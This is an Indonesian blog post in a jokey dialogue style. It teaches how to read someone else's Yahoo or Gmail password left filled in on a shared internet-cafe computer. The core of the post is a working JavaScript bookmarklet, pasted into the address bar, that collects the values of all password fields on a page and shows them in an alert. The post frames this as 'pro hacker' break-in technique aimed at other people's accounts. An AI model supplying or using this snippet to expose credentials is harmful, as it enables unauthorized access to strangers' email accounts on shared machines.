Teknik mengintip Password Terhidden (Tanpa Software)

Pernahkah Anda ke Warnet ketemu ada orang yang login Yahoo ato Gmail, Passwordnya masih tertinggal di web. mingkun dia lupa ato apa .. yang jelas pokoknya password tertinggal deh.. hehe.. 
Terus Pertanyaannya bisakah anda mengintip passwordnya.???


Timbul Pertanyaan .. !!
Anda : "Bisa donk , om..!!!, menggunakan Software. kan Om, pernah Posting sebelumnya

Menemukan Hidden Password dengan bantuan Software".


Saya : ya. benar. tapi Seandainya anda tidak punya software buat mengintip.. 

Anda : " Om, kan bisa tinggal download di blog trikdasar. "
Saya : ya.. saya jg tw mas..!! klo tanpa software gimn??

Anda : "hehe.. klo tanpa software ane gk bs deh. nyerah.. !! Caranya gimn donk..!!"
Saya  "Bagi seorang Pro hacker, prinsipnya adlah menjebol sesuatu tanpa menggunakan software" 
OK deh.. langsung aja.. tutorial nya..!!


Misalkan kasusnya di yahoo.
buka dulu http://mail.yahoo.com
Contoh gambar seperti ini:


Code:
javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no saved passwords in forms on this page.%22);})();

Pastekan code script diatas .!! ke URL .. maka automatis password terhidden akan muncul di pesan Allert
Contoh gambarnya seperti ini:

Nah.. sudah selasai.. gimana..?? ngerti kan!!

Tidak ada komentar:

Posting Komentar